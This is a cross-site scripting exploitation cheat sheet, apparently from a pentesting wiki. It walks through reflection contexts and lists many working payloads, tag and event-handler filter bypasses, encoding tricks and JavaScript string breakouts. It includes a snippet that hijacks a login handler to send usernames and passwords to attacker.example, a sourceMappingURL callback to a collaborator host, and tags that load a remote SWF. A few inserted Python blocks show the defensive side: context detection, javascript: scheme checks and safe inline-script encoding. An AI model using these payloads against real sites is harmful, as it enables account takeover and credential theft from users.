XSS (Cross Site Scripting)


Methodology

  1. Check if any value you control (parameters, path, headers?, cookies?) is being reflected in the HTML or used by JS code.
  2. Find the context where it's reflected/used.
  3. If reflected:
     1. Check which symbols you can use and, depending on that, prepare the payload:
        1. In raw HTML:
           1. Can you create new HTML tags?
           2. Can you use events or attributes supporting the javascript: protocol?
           3. Can you bypass protections?
           4. Is the HTML content being interpreted by any client side JS engine (AngularJS, VueJS, Mavo...)? Then you could abuse a Client Side Template Injection.
           5. If you cannot create HTML tags that execute JS code, could you abuse a Dangling Markup - HTML scriptless injection?
        2. Inside an HTML tag:
           1. Can you exit to the raw HTML context?
           2. Can you create new events/attributes to execute JS code?
           3. Does the attribute you are trapped in support JS execution?
           4. Can you bypass protections?
        3. Inside JavaScript code:
           1. Can you escape the <script> tag?
           2. Can you escape the string and execute different JS code?
           3. Is your input in template literals ``?
           4. Can you bypass protections?
     2. Javascript function being executed:
        1. You can indicate the name of the function to execute. e.g.: ?callback=alert(1)
  4. If used:
     1. You could exploit a DOM XSS; pay attention to how your input is controlled and whether your controlled input is used by any sink.

When working on a complex XSS you may find it useful to know about:

Debugging Client Side JS

Reflected values

In order to successfully exploit an XSS, the first thing you need to find is a value controlled by you that is being reflected in the web page.

  • Intermediately reflected: If you find that the value of a parameter or even the path is being reflected in the web page you could exploit a Reflected XSS.
  • Stored and reflected: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a Stored XSS.
  • Accessed via JS: If you find that a value controlled by you is being accessed using JS you could exploit a DOM XSS.

Contexts

When trying to exploit an XSS the first thing you need to know is where your input is being reflected. Depending on the context, you will be able to execute JS in different ways.

Raw HTML

If your input is reflected in the raw HTML of the page you will need to abuse some HTML tag in order to execute JS code: <img , <iframe , <svg , <script ... these are just some of the many possible HTML tags you could use.
Also, keep in mind Client Side Template Injection.

Inside HTML tag attributes

If your input is reflected inside the value of an attribute of a tag you could try:

  1. Escape from the attribute and from the tag (then you will be in the raw HTML) and create a new HTML tag to abuse: "><img [...]
  2. If you can escape from the attribute but not from the tag (> is encoded or deleted), depending on the tag you could create an event that executes JS code: " autofocus onfocus=alert(1) x="
  3. If you cannot escape from the attribute (" is being encoded or deleted), then depending on which attribute your value is being reflected in and whether you control all the value or just a part, you will be able to abuse it. For example, if you control an event like onclick= you will be able to make it execute arbitrary code when it's clicked. Another interesting example is the attribute href, where you can use the javascript: protocol to execute arbitrary code: href="javascript:alert(1)"
  4. If your input is reflected inside "unexploitable tags" you could try the accesskey trick to abuse the vuln (you will need some kind of social engineering to exploit this): " accesskey="x" onclick="alert(1)" x="

A weird example of Angular executing XSS if you control the class name:

```html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
```
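The context classification described above can be automated for your own application's regression tests. The following is an added example, not code from the original page: given a response body and the unique canary string that was submitted, it reports whether the canary landed in HTML text, in an attribute value (and which quote wraps it), inside a script block or inside a comment, using only the standard library. The canary, the helper names and the sample response are constructed for this illustration.

```python
import re
from html.parser import HTMLParser

CANARY = "zqx9canary"  # constructed: a unique marker submitted in the request


class ContextFinder(HTMLParser):
    """Collect every context in which the canary ends up, as the HTML parser
    (which runs before any JS) sees the response."""

    def __init__(self, canary):
        super().__init__()  # convert_charrefs=True: entities are decoded as in a browser
        self.canary = canary
        self.contexts = []
        self.script_buf = None  # collects <script> content until </script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_buf = ""
        raw = self.get_starttag_text()
        for name, value in attrs:
            if value is not None and self.canary in value:
                # The quote wrapping the attribute decides which character an
                # injection would need to escape the value (", ' or none).
                m = re.search(rf"(?<![\w-]){re.escape(name)}\s*=\s*([\"']?)", raw, re.I)
                self.contexts.append(("attribute", tag, name, m.group(1) if m else ""))

    def handle_endtag(self, tag):
        if tag == "script" and self.script_buf is not None:
            if self.canary in self.script_buf:
                self.contexts.append(("script", None, None, None))
            self.script_buf = None

    def handle_data(self, data):
        if self.script_buf is not None:
            self.script_buf += data  # script content may arrive in chunks
        elif self.canary in data:
            self.contexts.append(("html_text", None, None, None))

    def handle_comment(self, data):
        if self.canary in data:
            self.contexts.append(("comment", None, None, None))


def find_contexts(response_html, canary=CANARY):
    """Return (kind, tag, attribute, quote) tuples, in document order."""
    parser = ContextFinder(canary)
    parser.feed(response_html)
    parser.close()
    return parser.contexts


# Constructed sample response in which the canary is reflected five times.
SAMPLE_RESPONSE = f"""<html><body>
<!-- search term: {CANARY} -->
<input type="text" name="q" value="{CANARY}">
<a href='/search?q={CANARY}'>again</a>
<p>Results for {CANARY}</p>
<script>var term = "{CANARY}";</script>
</body></html>"""

if __name__ == "__main__":
    for ctx in find_contexts(SAMPLE_RESPONSE):
        print(ctx)
```

Each reported context maps to one of the sections that follow (raw HTML, inside a tag attribute, inside JavaScript code), which is also where the matching output encoding has to be applied.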

Inside JavaScript code

In this case your input is reflected between <script> [...] </script> tags of an HTML page, inside a .js file or inside an attribute using the javascript: protocol:

  • If reflected between <script> [...] </script> tags, even if your input is inside any kind of quotes, you can try to inject </script> and escape from this context. This works because the browser will first parse the HTML tags and then the content, therefore it won't notice that your injected </script> tag is inside the HTML code.
  • If reflected inside a JS string and the previous trick isn't working you would need to exit the string, execute your code and reconstruct the JS code (if there is any error, it won't be executed):
  • '-alert(1)-'
  • ';-alert(1)//
  • \';alert(1)//
  • If reflected inside template literals you can embed JS expressions using the ${ ... } syntax: var greetings = `Hello, ${alert(1)}`
  • Unicode encoding works to write valid javascript code:
```javascript
\u0061lert(1)
\u{61}lert(1)
al\u0065rt(1)
```

Javascript Hoisting

Javascript Hoisting refers to the opportunity to declare functions, variables or classes after they are used, so you can abuse scenarios where an XSS is using undeclared variables or functions.
Check the following page for more info:

JS Hoisting

Javascript Function

Several web pages have endpoints that accept as parameter the name of the function to execute. A common example to see in the wild is something like: ?callback=callbackFunc.

A good way to find out if something given directly by the user is trying to be executed is modifying the param value (for example to 'Vulnerable') and looking in the console for errors like:

If it's vulnerable, you could be able to trigger an alert just by sending the value: ?callback=alert(1). However, it's very common that these endpoints validate the content to only allow letters, numbers, dots and underscores ([\w\._]).

However, even with that limitation it's still possible to perform some actions. This is because you can use those valid chars to access any element in the DOM:

Some useful functions for this:

firstElementChild
lastElementChild
nextElementSibling
previousElementSibling
parentElement

You can also try to trigger Javascript functions directly: obj.sales.delOrders.

However, usually the endpoints executing the indicated function are endpoints without much interesting DOM; other pages in the same origin will have a more interesting DOM to perform more actions.

Therefore, in order to abuse this vulnerability in a different DOM the Same Origin Method Execution (SOME) exploitation was developed:

SOME - Same Origin Method Execution

DOM

There is JS code that is using unsafely some data controlled by an attacker like location.href. An attacker could abuse this to execute arbitrary JS code.

DOM XSS

Universal XSS

These kinds of XSS can be found anywhere. They don't depend only on the client exploitation of a web application but on any context. These kinds of arbitrary JavaScript execution can even be abused to obtain RCE, read arbitrary files in clients and servers, and more.
Some examples:

Server Side XSS (Dynamic PDF)

Electron Desktop Apps

WAF bypass encoding image

from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21

Injecting inside raw HTML

When your input is reflected inside the HTML page, or you can escape and inject HTML code in this context, the first thing you need to do is check if you can abuse < to create new tags: just try to reflect that char and check if it's being HTML encoded, deleted, or reflected without changes. Only in the last case will you be able to exploit this case.
For these cases also keep in mind Client Side Template Injection.
Note: an HTML comment can be closed using --> or --!>

In this case, and if no black/whitelisting is used, you could use payloads like:

```html
<script>
alert(1)
</script>
<img src="x" onerror="alert(1)" />
<svg onload=alert('XSS')>
```

But, if a tags/attributes black/whitelisting is being used, you will need to brute-force which tags you can create.
Once you have located which tags are allowed, you will need to brute-force attributes/events inside the found valid tags to see how you can attack the context.

Tags/Events brute-force

Go to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet and click Copy tags to clipboard. Then, send all of them using Burp intruder and check if any tag wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can brute force all the events using the valid tags (in the same web page click Copy events to clipboard and follow the same procedure as before).

Custom tags

If you didn't find any valid HTML tag, you could try to create a custom tag and execute JS code with the onfocus attribute. In the XSS request, you need to end the URL with # to make the page focus on that object and execute the code:

/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x

Blacklist Bypasses

If some kind of blacklist is being used you could try to bypass it with some silly tricks:

```javascript
//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG

//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>

//You can substitute the space separating attributes with:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09

//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>

//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>

//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //

//Extra open
<<script>alert("XSS");//<</script>

//Just weird and unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">

//Using `` instead of parenthesis
onerror=alert`1`

//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
```

Length bypass (small XSSs)

Note: Tiny XSS payloads for different environments can be found here and here.

```html
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>
```

The last one is using 2 unicode characters which expand to 5: telsr
More of these characters can be found here.
To check which characters are decomposed, check here.

Click XSS - Clickjacking

If in order to exploit the vulnerability you need the user to click a link or a form with prefilled data you could try to abuse Clickjacking (if the page is vulnerable).

Impossible - Dangling Markup

If you think that it's impossible to create an HTML tag with an attribute to execute JS code, you should check Dangling Markup because you could exploit the vulnerability without executing JS code.

Injecting inside HTML tag

Inside the tag/escaping from attribute value

If you are inside an HTML tag, the first thing you could try is to escape from the tag and use some of the techniques mentioned in the previous section to execute JS code.
If you cannot escape from the tag, you could create new attributes inside the tag to try to execute JS code, for example using a payload like (note that in this example double quotes are used to escape from the attribute; you won't need them if your input is reflected directly inside the tag):

```html
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
```

Style events

```html
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

<!-- Payload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked: -->
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
<!-- Moving your mouse anywhere over the page (0-click-ish): -->
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
```

Inside the attribute

Even if you cannot escape from the attribute (" is being encoded or deleted), depending on which attribute your value is being reflected in, and whether you control all the value or just a part of it, you will be able to abuse it. For example, if you control an event like onclick= you will be able to make it execute arbitrary code when it's clicked.
Another interesting example is the attribute href, where you can use the javascript: protocol to execute arbitrary code: href="javascript:alert(1)"

Bypass inside event using HTML encoding/URL encode

HTML encoded characters inside the value of HTML tag attributes are decoded at runtime. Therefore something like the following will be valid (the payload is the &apos;-alert(1)-&apos; part): <a id="author" href="http://none" onclick="var tracker='http://foo?&apos;-alert(1)-&apos;';">Go Back </a>

Note that any kind of HTML encoding is valid:

```html
//HTML entities
&apos;-alert(1)-&apos;
//HTML hex without zeros
&#x27-alert(1)-&#x27
//HTML hex with zeros
&#x00027-alert(1)-&#x00027
//HTML dec without zeros
&#39-alert(1)-&#39
//HTML dec with zeros
&#00039-alert(1)-&#00039

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">a</a>
```

Note that URL encoding will also work:

```html
<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
```

Bypass inside event using Unicode encode

```html
//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
```

Special Protocols Within the attribute

There you can use the protocols javascript: or data: in some places to execute arbitrary JS code. Some will require user interaction and some won't.

```javascript
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
javascript:alert(1)
java        //Note the new line
script:alert(1)

data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
 A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```

Places where you can inject these protocols

In general the javascript: protocol can be used in any tag that accepts the attribute href and in most of the tags that accept the attribute src (but not <img)

```html
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>

<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>

//Special cases
<object data="//hacker.site/xss.swf"> //https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">
```
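The reason the entity-encoded, mixed-case and newline-split forms of these protocols (and the HTML-encoded handler values from the previous section) get past a check on the raw markup is that the HTML parser decodes character references in attribute values, and the URL parser strips tabs and newlines and lowercases the scheme, before anything is evaluated. This added example (not code from the original page; helper names and the sample markup are constructed from the shapes listed above) shows the defender's view: it decodes attribute values exactly as Python's HTML parser does and then takes the scheme the way the WHATWG URL parser does, so the check runs on what the browser will actually see.

```python
import re
from html.parser import HTMLParser

URL_ATTRIBUTES = {"href", "src", "action", "formaction", "data", "code"}
SCRIPT_SCHEMES = {"javascript", "data", "vbscript"}


class _AttributeCollector(HTMLParser):
    """Collect (tag, attribute, decoded value) triples. convert_charrefs (the
    default) decodes &#106; / &#x61 / &colon; in attribute values like a browser."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            self.found.append((tag, name, value or ""))


def decoded_attributes(fragment):
    parser = _AttributeCollector()
    parser.feed(fragment)
    parser.close()
    return parser.found


def url_scheme(value):
    """Scheme of `value` as the URL parser would determine it, or None.
    Mirrors the WHATWG URL spec: strip leading/trailing C0 controls and spaces,
    drop every ASCII tab/newline, then read an ASCII-alpha scheme up to ':'."""
    value = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", value)
    value = re.sub(r"[\t\n\r]", "", value)
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", value)
    return match.group(1).lower() if match else None


def script_bearing_urls(fragment):
    """(tag, attribute, decoded value) for URL attributes whose effective scheme
    can run script. An output-side check has to look at this decoded value."""
    return [
        (tag, name, value)
        for tag, name, value in decoded_attributes(fragment)
        if name in URL_ATTRIBUTES and url_scheme(value) in SCRIPT_SCHEMES
    ]


def naive_check(fragment):
    """The raw-markup filter that the encodings listed above slip past."""
    return "javascript:" in fragment.lower()


# Constructed sample: entity-encoded, mixed-case, newline-split and data: forms,
# plus two harmless URLs that must not be flagged.
SAMPLE = """
<a href="&#106;avascript:alert(2)">a</a>
<a href="jav&#x61script:alert(3)">b</a>
<a href="javascript&colon;alert(1)">c</a>
<form action="JavaSCript:alert(1)"><button>send</button></form>
<iframe src="java
script:alert(1)"></iframe>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
<a href="https://example.com/page?next=javascript">safe</a>
<img src="/static/logo.png">
"""

if __name__ == "__main__":
    for hit in script_bearing_urls(SAMPLE):
        print(hit)
```

The same decode-then-check order applies to the percent-decoding that happens inside a javascript: URL body, which is why rejecting the scheme, rather than pattern-matching the payload, is the robust rule.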

Other obfuscation tricks

In this case the HTML encoding and the Unicode encoding trick from the previous section are also valid, as you are inside an attribute.

```html
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```

Moreover, there is another nice trick for these cases: even if your input inside javascript:... is being URL encoded, it will be URL decoded before it's executed. So, if you need to escape from the string using a single quote and you see that it's being URL encoded, remember that it doesn't matter: it will be interpreted as a single quote at execution time.

```html
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
```

Note that if you try to use both URL encoding and HTML encoding in any order to encode the whole payload it won't work, but you can mix them inside the payload.

Using Hex and Octal encode with javascript:

You can use Hex and Octal encoding inside the src attribute of iframe (at least) to declare HTML tags to execute JS:

```html
//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />

//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
```

Reverse tab nabbing

```html
<a target="_blank" rel="opener"
```

If you can inject any URL in an arbitrary <a href= tag that contains the attributes target="_blank" and rel="opener", check the following page to exploit this behavior:

Reverse Tab Nabbing

on Event Handlers Bypass

First of all check this page (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) for useful "on" event handlers.
In case there is some blacklist preventing you from creating these event handlers you can try the following bypasses:

```html
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>

//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
```

From here it's now possible to abuse hidden inputs with:

```html
<button popovertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />
```

And in meta tags:

```html
<!-- Injection inside meta attribute-->
<meta
name="apple-mobile-web-app-title"
content=""
Twitter
popover
id="newsletter"
onbeforetoggle="alert(2)" />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
```

From here: You can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:

```html
<input type="hidden" accesskey="X" onclick="alert(1)">
```

The XSS payload will be something like this: " accesskey="x" onclick="alert(1)" x="

Blacklist Bypasses

Several tricks using different encodings were already exposed inside this section. Go back to learn where you can use:

  • HTML encoding (HTML tags)
  • Unicode encoding (can be valid JS code): \u0061lert(1)
  • URL encoding
  • Hex and Octal encoding
  • data encoding

Bypasses for HTML tags and attributes

Read the Blacklist Bypasses of the previous section.

Bypasses for JavaScript code

Read the JavaScript bypass blacklist of the following section.

CSS-Gadgets

If you found an XSS in a very small part of the web that requires some kind of interaction (maybe a small link in the footer with an onmouseover element), you can try to modify the space that element occupies to maximize the probability of having the link fired.

For example, you could add some styling to the element like: position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5

But, if the WAF is filtering the style attribute, you can use CSS Styling Gadgets, so if you find, for example

```css
.test {display:block; color: blue; width: 100%}
```

and

```css
#someid {top: 0; font-family: Tahoma;}
```

you can now modify the link and bring it to the form

```html
<a href="" id=someid class=test onclick=alert() a="">
```

This trick was taken from https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703

Injecting inside JavaScript code

In these cases your input is going to be reflected inside the JS code of a .js file, between <script>...</script> tags, between HTML events that can execute JS code, or between attributes that accept the javascript: protocol.

Escaping <script> tag

If your code is inserted within <script> [...] var input = 'reflected data' [...] </script> you could easily escape by closing the <script> tag:

```html
</script><img src=1 onerror=alert(document.domain)>
```

Note that in this example we haven't even closed the single quote. This is because HTML parsing is performed first by the browser, which involves identifying the page elements, including blocks of script. The parsing of JavaScript to understand and execute the embedded scripts is only carried out afterwards.

Inside JS code

If <> are being sanitised you can still escape the string where your input is located and execute arbitrary JS. It's important to fix the JS syntax, because if there are any errors, the JS code won't be executed:

```javascript
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
```

JS-in-JS string break → inject → repair pattern

When user input lands inside a quoted JavaScript string (e.g., a server-side echo into an inline script), you can terminate the string, inject code, and repair the syntax so that parsing stays valid. Generic skeleton:

```javascript
"            // end original string
;            // safely terminate the statement
<INJECTION>  // attacker-controlled JS
; a = "      // repair and resume expected string/statement
```

Example URL structure when a vulnerable parameter is reflected inside a JS string:

```text
?param=test";<INJECTION>;a="
```

This executes attacker JS without needing to touch the HTML context (pure JS-in-JS). Combine it with the blacklist bypasses below when filters block keywords.
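The defence against both the </script> break-out and the string break-inject-repair pattern is to never place raw data inside an inline script: JSON-encode it and additionally escape <, > and & so that the HTML tokenizer, which runs before the JS parser, can never see a closing tag. This is an added example, not code from the page (helper names and sample values are mine); ensure_ascii keeps U+2028/U+2029, which the JS engine treats as line terminators, as \u escapes, and the resulting literal must be placed where a JS string literal is expected, never inside a backtick template.

```python
import json

# Characters that matter to the HTML tokenizer even inside a <script> block.
_HTML_SENSITIVE = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def js_string_literal(value):
    """A JS literal for `value` (str, dict, list, ...) that is safe inside
    <script>...</script>. JSON escapes quotes and backslashes; ensure_ascii
    (the default) turns U+2028/U+2029 into \\u2028/\\u2029; the extra
    replacements stop the HTML parser from finding </script> in the text."""
    encoded = json.dumps(value)
    for ch, esc in _HTML_SENSITIVE.items():
        encoded = encoded.replace(ch, esc)
    return encoded


def render_inline_script(var_name, value):
    """Emit a <script> element assigning `value` to `var_name` safely."""
    return f"<script>var {var_name} = {js_string_literal(value)};</script>"


def render_inline_script_naive(var_name, value):
    """The vulnerable pattern from the section above: raw value between quotes."""
    return f'<script>var {var_name} = "{value}";</script>'


def breaks_out_of_script(markup):
    """True if the HTML tokenizer would end the script block early, i.e. a
    '</script' (case-insensitive) occurs anywhere besides the real close tag."""
    body = markup[len("<script>"):].lower()
    return body.count("</script") != 1


def js_value_of(literal):
    """What the JS engine will see for a literal produced above. JSON and JS
    share the \\uXXXX escape syntax, so json.loads reproduces the JS result."""
    return json.loads(literal)


if __name__ == "__main__":
    payload = "</script><img src=1 onerror=alert(document.domain)>"  # from the section above
    print(render_inline_script_naive("term", payload))
    print(render_inline_script("term", payload))
```

The percent-encoding tricks described for javascript: URLs do not apply here; what the JS engine receives is exactly what js_value_of returns, and the quotes the page's break-out payloads rely on never reach it unescaped.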

Template literals ``

In order to construct strings, apart from single and double quotes, JS also accepts backticks ``. This is known as template literals as they allow embedded JS expressions using the ${ ... } syntax.
Therefore, if you find that your input is being reflected inside a JS string that is using backticks, you can abuse the ${ ... } syntax to execute arbitrary JS code:

This can be abused using:

```javascript
;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`
```

```javascript
// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop() {
  return loop
}
loop``
```

Encoded code execution

```html
<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>alert(1)</script></svg>  <!-- The svg tags are necessary -->
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
```

eval(atob()) delivered payloads and scope differences

To keep URLs short and bypass naive keyword filters, you can base64-encode your real logic and evaluate it with eval(atob('...')). If naive keyword filters block identifiers such as alert, eval or atob, use Unicode-escaped identifiers that compile to the same thing in the browser but evade string-matching filters:

```javascript
\u0061\u006C\u0065\u0072\u0074(1)                      // alert(1)
\u0065\u0076\u0061\u006C(\u0061\u0074\u006F\u0062('BASE64'))  // eval(atob('...'))
```

Important difference about scoping: const/let declared inside eval() are block-scoped and do NOT create globals; they won't be reachable by subsequent scripts. Use a dynamically injected <script> element to define global, non-rebindable hooks when needed (for example, to hijack a form handler):

```javascript
var s = document.createElement('script');
s.textContent = "const DoLogin = () => {const pwd = Trim(FormInput.InputPassword.value); const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));}";
document.head.appendChild(s);
```

References: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval

JS execution via Unicode encoding

```javascript
\u0061lert(1)
\u{61}lert(1)
al\u0065rt(1)
```

JavaScript bypass blacklists techniques

Strings

```javascript
"thisisastring"
'thisisastring'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
```

Special escapes

```javascript
"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
// Any other char escaped is just itself
```

Space substitutions inside JS code

```javascript
<TAB>
/**/
```

JavaScript comments (from the JavaScript Comments trick)

```javascript
//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must be at the beginning of the first line
-->This is a 1 line comment, but "-->" must be at the beginning of the first line
```

JavaScript new lines (from the JavaScript new line trick)

```javascript
//Javascript interprets these chars as a new line:
String.fromCharCode(10)
alert("//\nalert(1)") //0x0a
String.fromCharCode(13)
alert("//\ralert(1)") //0x0d
String.fromCharCode(8232)
alert("//\u2028alert(1)") //0xe2 0x80 0xa8
String.fromCharCode(8233)
alert("//\u2029alert(1)") //0xe2 0x80 0xa9
```

JavaScript whitespaces

```javascript
log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
  try{
    eval(`funct${String.fromCodePoint(i)}()`);
    log.push(i);
  }
  catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279

//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert&#65279;(1)>
```

Javascript inside a comment

```javascript
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools a request to the indicated sourceMappingURL will be sent

//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
```

JavaScript without parentheses

```javascript
// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name

// Backticks
// Backticks pass the string as an array of length 1
alert`1`

// Backticks + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`

// To pass several arguments you can use
function btt(){
  console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`

//It's possible to construct a function and call it
Function`x${'alert(1337)'}x`

// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and that's why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
